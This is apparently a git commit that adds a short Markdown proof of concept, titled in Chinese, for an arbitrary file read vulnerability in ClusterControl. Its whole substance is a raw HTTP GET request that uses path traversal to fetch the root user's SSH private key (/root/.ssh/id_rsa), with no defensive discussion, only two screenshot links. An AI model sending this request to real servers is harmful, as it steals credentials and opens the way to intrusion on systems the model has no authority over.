整理文件
This commit is contained in:
16
ClusterControl/ClusterControl存在任意文件读取漏洞.md
Normal file
16
ClusterControl/ClusterControl存在任意文件读取漏洞.md
Normal file
@@ -0,0 +1,16 @@
|
||||
# ClusterControl存在任意文件读取漏洞
|
||||
|
||||
|
||||
|
||||
## poc
|
||||
|
||||
```yaml
|
||||
GET /../../../../../../../../..//root/.ssh/id_rsa HTTP/1.1
|
||||
Host:
|
||||
Accept-Encoding: identity
|
||||
User-Agent: python-urllib3/1.26.4
|
||||
```
|
||||
|
||||

|
||||
|
||||

|
||||
Reference in New Issue
Block a user